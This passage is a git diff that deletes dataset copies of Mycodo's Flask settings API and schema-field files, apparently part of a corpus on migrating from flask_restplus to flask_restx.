utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db( - MeasurementSchema, Measurement, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/outputs') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsOutputs(Resource): - """Interacts with output settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(output_list_fields) - @flask_login.login_required - def get(self): - """Show all output settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(OutputSchema, Output) - if list_data: - return {'output settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/outputs/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the output'} -) -class SettingsOutputsUniqueID(Resource): - """Interacts with output settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(output_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an output with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(OutputSchema, Output, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/pids') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsPIDs(Resource): - """Interacts with PID settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(pid_list_fields) - @flask_login.login_required - def get(self): - """Show all pid settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data =
get_from_db(PIDSchema, PID) - if list_data: - return {'pid settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/pids/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the pid'} -) -class SettingsPIDsUniqueID(Resource): - """Interacts with PID settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(pid_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a pid with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(PIDSchema, PID, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/triggers') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsTriggers(Resource): - """Interacts with Trigger settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(trigger_list_fields) - @flask_login.login_required - def get(self): - """Show all trigger settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(TriggerSchema, Trigger) - if list_data: - return {'trigger settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/triggers/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the trigger'} -) -class SettingsTriggersUniqueID(Resource): - """Interacts with Trigger settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(trigger_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a trigger with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(TriggerSchema, Trigger, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/units') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsUnits(Resource): - """Interacts with Unit settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(unit_list_fields) - @flask_login.login_required - def get(self): - """Show all unit settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(UnitSchema, Unit) - if list_data: - return {'unit settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/units/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the unit'} -) -class SettingsUnitsUniqueID(Resource): - """Interacts with unit settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(unit_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a unit with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data
= get_from_db(UnitSchema, Unit, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/users') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsUsers(Resource): - """Interacts with User settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(user_list_fields) - @flask_login.login_required - def get(self): - """Show all user settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(UserSchema, User) - if list_data: - return {'user settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/users/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the user'} -) -class SettingsUsersUniqueID(Resource): - """Interacts with user settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(user_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a user with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - - try: - dict_data = get_from_db(UserSchema, User, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.target.py deleted file mode 100644 index 9213228..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.target.py +++ /dev/null @@ -1,557 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Input -from mycodo.databases.models import Math -from mycodo.databases.models import Measurement -from mycodo.databases.models import Output -from mycodo.databases.models import PID -from mycodo.databases.models import Trigger -from mycodo.databases.models import Unit -from mycodo.databases.models import User -from mycodo.databases.models.function import TriggerSchema -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.math import MathSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.measurement import MeasurementSchema -from mycodo.databases.models.measurement import UnitSchema -from mycodo.databases.models.output import OutputSchema -from mycodo.databases.models.pid import PIDSchema -from mycodo.databases.models.user import UserSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import input_fields -from mycodo.mycodo_flask.api.sql_schema_fields import math_fields -from mycodo.mycodo_flask.api.sql_schema_fields import measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import output_fields -from
mycodo.mycodo_flask.api.sql_schema_fields import pid_fields -from mycodo.mycodo_flask.api.sql_schema_fields import trigger_fields -from mycodo.mycodo_flask.api.sql_schema_fields import unit_fields -from mycodo.mycodo_flask.api.sql_schema_fields import user_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_settings = api.namespace('settings', description='Settings operations') - -device_measurement_list_fields = ns_settings.model( - 'Device Measurement Settings Fields List', { - 'device measurement settings': fields.List(fields.Nested( - device_measurement_fields)), - } -) - -input_list_fields = ns_settings.model('Input Settings Fields List', { - 'input settings': fields.List(fields.Nested(input_fields)), -}) - -math_list_fields = ns_settings.model('Math Settings Fields List', { - 'math settings': fields.List(fields.Nested(math_fields)), -}) - -measurement_list_fields = ns_settings.model( - 'Measurement Settings Fields List', { - 'measurement settings': fields.List( - fields.Nested(device_measurement_fields)), - } -) - -output_list_fields = ns_settings.model('Output Settings Fields List', { - 'output settings': fields.List(fields.Nested(output_fields)), -}) - -pid_list_fields = ns_settings.model('PID Settings Fields List', { - 'pid settings': fields.List(fields.Nested(pid_fields)), -}) - -trigger_list_fields = ns_settings.model('Trigger Settings Fields List', { - 'trigger settings': fields.List(fields.Nested(trigger_fields)), -}) - -unit_list_fields = ns_settings.model('Unit Settings Fields List', { - 'unit settings': fields.List(fields.Nested(unit_fields)), -}) - -user_list_fields = ns_settings.model('User Settings Fields List', { - 'user settings': fields.List(fields.Nested(user_fields)), -}) - - -@ns_settings.route('/device_measurements') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsDeviceMeasurements(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_list_fields) - @flask_login.login_required - def get(self): - """Show all device measurement settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db( - DeviceMeasurementsSchema, DeviceMeasurements) - if list_data: - return {'device measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/device_measurements/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the measurement'} -) -class SettingsDeviceMeasurementsUniqueID(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a device measurement with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db( - DeviceMeasurementsSchema, - DeviceMeasurements, - unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - -
-@ns_settings.route('/device_measurements/by_device_id/<string:device_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'device_id': 'The unique ID of the controller (Input, Math, ' - 'etc.) for which the measurement belongs.'} -) -class SettingsDeviceMeasurementsDeviceID(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_list_fields) - @flask_login.login_required - def get(self, device_id): - """Show the settings for all device measurements with the device_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=device_id).all(), many=True)) - if list_data: - return {'device measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/inputs') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsInputs(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(input_list_fields) - @flask_login.login_required - def get(self): - """Show all input settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(InputSchema, Input) - if list_data: - return {'input settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/inputs/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input'} -) -class SettingsInputsUniqueID(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(input_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an input""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(InputSchema, Input, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/maths') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsMaths(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(math_list_fields) - @flask_login.login_required - def get(self): - """Show all math settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MathSchema, Math) - if list_data: - return {'math settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/maths/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the math'} -) -class SettingsMathsUniqueID(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(math_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an math""" - if not
utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(MathSchema, Math, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/measurements') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsMeasurements(Resource): - """Interacts with measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self): - """Show all measurement settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MeasurementSchema, Measurement) - if list_data: - return {'measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/measurements/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the measurement'} -) -class SettingsMeasurementsUniqueID(Resource): - """Interacts with measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(measurement_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a measurement with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db( - MeasurementSchema, Measurement, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/outputs') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsOutputs(Resource): - """Interacts with output settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(output_list_fields) - @flask_login.login_required - def get(self): - """Show all output settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(OutputSchema, Output) - if list_data: - return {'output settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/outputs/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the output'} -) -class SettingsOutputsUniqueID(Resource): - """Interacts with output settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(output_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an output with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(OutputSchema, Output, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/pids') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsPIDs(Resource): - """Interacts with PID settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(pid_list_fields) - @flask_login.login_required - def get(self): - """Show all pid settings"""
- if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(PIDSchema, PID) - if list_data: - return {'pid settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/pids/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the pid'} -) -class SettingsPIDsUniqueID(Resource): - """Interacts with PID settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(pid_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a pid with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(PIDSchema, PID, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/triggers') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsTriggers(Resource): - """Interacts with Trigger settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(trigger_list_fields) - @flask_login.login_required - def get(self): - """Show all trigger settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(TriggerSchema, Trigger) - if list_data: - return {'trigger settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/triggers/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the trigger'} -) -class SettingsTriggersUniqueID(Resource): - """Interacts with Trigger settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(trigger_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a trigger with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(TriggerSchema, Trigger, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/units') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsUnits(Resource): - """Interacts with Unit settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(unit_list_fields) - @flask_login.login_required - def get(self): - """Show all unit settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(UnitSchema, Unit) - if list_data: - return {'unit settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/units/<string:unique_id>') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the unit'} -) -class SettingsUnitsUniqueID(Resource): - """Interacts with unit settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(unit_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a unit with the
unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(UnitSchema, Unit, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/users') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsUsers(Resource): - """Interacts with User settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(user_list_fields) - @flask_login.login_required - def get(self): - """Show all user settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(UserSchema, User) - if list_data: - return {'user settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/users/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the user'} -) -class SettingsUsersUniqueID(Resource): - """Interacts with user settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(user_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a user with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - - try: - dict_data = get_from_db(UserSchema, User, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.diff deleted file mode 100644 index cb64232..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.diff +++ /dev/null @@ -1,11 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/sql_schema_fields.py b/mycodo/mycodo_flask/api/sql_schema_fields.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/sql_schema_fields.py - +++ b/mycodo/mycodo_flask/api/sql_schema_fields.py -@@ -1,5 +1,5 @@ - # coding=utf-8 --from flask_restplus import fields -+from flask_restx import fields - - from mycodo.mycodo_flask.api import api - diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.source.py deleted file mode 100644 index 877363a..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.source.py +++ /dev/null @@ -1,243 +0,0 @@ -# coding=utf-8 -from flask_restplus import fields - -from mycodo.mycodo_flask.api import api - -device_measurement_fields = api.model('Device Measurement Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'device_type': fields.String, - 'device_id': fields.String, - 'is_enabled': fields.Boolean, - 'measurement': fields.String, - 'measurement_type': fields.String, - 'unit': fields.String, - 'channel': fields.Integer, - 'invert_scale': fields.Boolean, - 'rescaled_measurement': fields.String, - 'rescaled_unit': fields.String, - 'scale_from_min': fields.Float, - 
'scale_from_max': fields.Float, - 'scale_to_min': fields.Float, - 'scale_to_max': fields.Float, - 'conversion_id': fields.String, -}) - -input_fields = api.model('Input Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'is_preset': fields.Boolean, - 'preset_name': fields.String, - 'device': fields.String, - 'interface': fields.String, - 'period': fields.Float, - 'start_offset': fields.Float, - 'power_output_id': fields.String, - 'resolution': fields.Integer, - 'resolution_2': fields.Integer, - 'sensitivity': fields.Integer, - 'thermocouple_type': fields.String, - 'ref_ohm': fields.Integer, - 'calibrate_sensor_measure': fields.String, - 'location': fields.String, - 'gpio_location': fields.Integer, - 'i2c_location': fields.String, - 'i2c_bus': fields.Integer, - 'ftdi_location': fields.String, - 'uart_location': fields.String, - 'baud_rate': fields.Integer, - 'pin_clock': fields.Integer, - 'pin_cs': fields.Integer, - 'pin_mosi': fields.Integer, - 'pin_miso': fields.Integer, - 'bt_adapter': fields.String, - 'switch_edge': fields.String, - 'switch_bouncetime': fields.Integer, - 'switch_reset_period': fields.Integer, - 'pre_output_id': fields.String, - 'pre_output_duration': fields.Float, - 'pre_output_during_measure': fields.Boolean, - 'sht_voltage': fields.String, - 'adc_gain': fields.Integer, - 'adc_resolution': fields.Integer, - 'adc_sample_speed': fields.String, - 'cmd_command': fields.String, - 'weighting': fields.Float, - 'rpm_pulses_per_rev': fields.Float, - 'sample_time': fields.Float, - 'port': fields.Integer, - 'times_check': fields.Integer, - 'deadline': fields.Integer, - 'datetime': fields.DateTime, - 'custom_options': fields.String -}) - -math_fields = api.model('Math Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'math_type': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'period': fields.Float, - 'start_offset': fields.Float, - 'max_measure_age': fields.Integer, - 'order_of_use': fields.String, - 'difference_reverse_order': fields.Boolean, - 'difference_absolute': fields.Boolean, - 'equation_input': fields.String, - 'equation': fields.String, - 'max_difference': fields.Float, - 'inputs': fields.String, - 'dry_bulb_t_id': fields.String, - 'dry_bulb_t_measure_id': fields.String, - 'wet_bulb_t_id': fields.String, - 'wet_bulb_t_measure_id': fields.String, - 'pressure_pa_id': fields.String, - 'pressure_pa_measure_id': fields.String, - 'unique_id_1': fields.String, - 'unique_measurement_id_1': fields.String, - 'unique_id_2': fields.String, - 'unique_measurement_id_2': fields.String, -}) - -measurement_fields = api.model('Measurement Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name_safe': fields.String, - 'name': fields.String, - 'units': fields.String -}) - -output_fields = api.model('Output Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'output_type': fields.String, - 'output_mode': fields.String, - 'interface': fields.String, - 'location': fields.String, - 'i2c_bus': fields.Integer, - 'baud_rate': fields.Integer, - 'name': fields.String, - 'measurement': fields.String, - 'unit': fields.String, - 'conversion_id': fields.String, - 'channel': fields.Integer, - 'pin': fields.Integer, - 'on_state': fields.Boolean, - 'amps': fields.Float, - 'on_until': fields.DateTime, - 'off_until': fields.DateTime, - 
'last_duration': fields.Float, - 'on_duration': fields.Boolean, - 'protocol': fields.Integer, - 'pulse_length': fields.Integer, - 'on_command': fields.String, - 'off_command': fields.String, - 'pwm_command': fields.String, - 'trigger_functions_at_start': fields.Boolean, - 'state_startup': fields.String, - 'startup_value': fields.Float, - 'state_shutdown': fields.String, - 'shutdown_value': fields.Float, - 'pwm_hertz': fields.Integer, - 'pwm_library': fields.String, - 'pwm_invert_signal': fields.Boolean, - 'flow_rate': fields.Float -}) - -pid_fields = api.model('PID Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'is_held': fields.Boolean, - 'is_paused': fields.Boolean, - 'is_preset': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'preset_name': fields.String, - 'period': fields.Float, - 'start_offset': fields.Float, - 'max_measure_age': fields.Float, - 'measurement': fields.String, - 'direction': fields.String, - 'setpoint': fields.Float, - 'band': fields.Float, - 'p': fields.Float, - 'i': fields.Float, - 'd': fields.Float, - 'integrator_min': fields.Float, - 'integrator_max': fields.Float, - 'raise_output_id': fields.String, - 'raise_min_duration': fields.Float, - 'raise_max_duration': fields.Float, - 'raise_min_off_duration': fields.Float, - 'lower_output_id': fields.String, - 'lower_min_duration': fields.Float, - 'lower_max_duration': fields.Float, - 'lower_min_off_duration': fields.Float, - 'store_lower_as_negative': fields.Boolean, - 'setpoint_tracking_type': fields.String, - 'setpoint_tracking_id': fields.String, - 'setpoint_tracking_max_age': fields.Float, - 'method_start_time': fields.String, - 'method_end_time': fields.String, - 'autotune_activated': fields.Boolean, - 'autotune_noiseband': fields.Float, - 'autotune_outstep': fields.Float -}) - -trigger_fields = api.model('Trigger Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'trigger_type': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'unique_id_1': fields.String, - 'unique_id_2': fields.String, - 'output_state': fields.String, - 'output_duration': fields.Float, - 'output_duty_cycle': fields.Float, - 'rise_or_set': fields.String, - 'latitude': fields.Float, - 'longitude': fields.Float, - 'zenith': fields.Float, - 'date_offset_days': fields.Integer, - 'time_offset_minutes': fields.Integer, - 'period': fields.Float, - 'timer_start_offset': fields.Integer, - 'timer_start_time': fields.String, - 'timer_end_time': fields.String, - 'program': fields.String, - 'word': fields.String, - 'method_start_time': fields.String, - 'method_end_time': fields.String, - 'trigger_actions_at_period': fields.Boolean, - 'trigger_actions_at_start': fields.Boolean, - 'measurement': fields.String, - 'edge_detected': fields.String, -}) - -unit_fields = api.model('Unit Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name_safe': fields.String, - 'name': fields.String, - 'unit': fields.String -}) - -user_fields = api.model('User Settings Fields', { - "id": fields.Integer, - "unique_id": fields.String, - "name": fields.String, - "email": fields.String, - "role_id": fields.Integer, - "theme": fields.String, - "landing_page": fields.String, - "language": fields.String -}) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.target.py 
b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.target.py deleted file mode 100644 index af682b9..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.target.py +++ /dev/null @@ -1,243 +0,0 @@ -# coding=utf-8 -from flask_restx import fields - -from mycodo.mycodo_flask.api import api - -device_measurement_fields = api.model('Device Measurement Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'device_type': fields.String, - 'device_id': fields.String, - 'is_enabled': fields.Boolean, - 'measurement': fields.String, - 'measurement_type': fields.String, - 'unit': fields.String, - 'channel': fields.Integer, - 'invert_scale': fields.Boolean, - 'rescaled_measurement': fields.String, - 'rescaled_unit': fields.String, - 'scale_from_min': fields.Float, - 'scale_from_max': fields.Float, - 'scale_to_min': fields.Float, - 'scale_to_max': fields.Float, - 'conversion_id': fields.String, -}) - -input_fields = api.model('Input Settings Fields', { - 'id': fields.Integer, - 'unique_id': fields.String, - 'name': fields.String, - 'is_activated': fields.Boolean, - 'log_level_debug': fields.Boolean, - 'is_preset': fields.Boolean, - 'preset_name': fields.String, - 'device': fields.String, - 'interface': fields.String, - 'period': fields.Float, - 'start_offset': fields.Float, - 'power_output_id': fields.String, - 'resolution': fields.Integer, - 'resolution_2': fields.Integer, - 'sensitivity': fields.Integer, - 'thermocouple_type': fields.String, - 'ref_ohm': fields.Integer, - 'calibrate_sensor_measure': fields.String, - 'location': fields.String, - 'gpio_location': fields.Integer, - 'i2c_location': fields.String, - 'i2c_bus': fields.Integer, - 'ftdi_location': 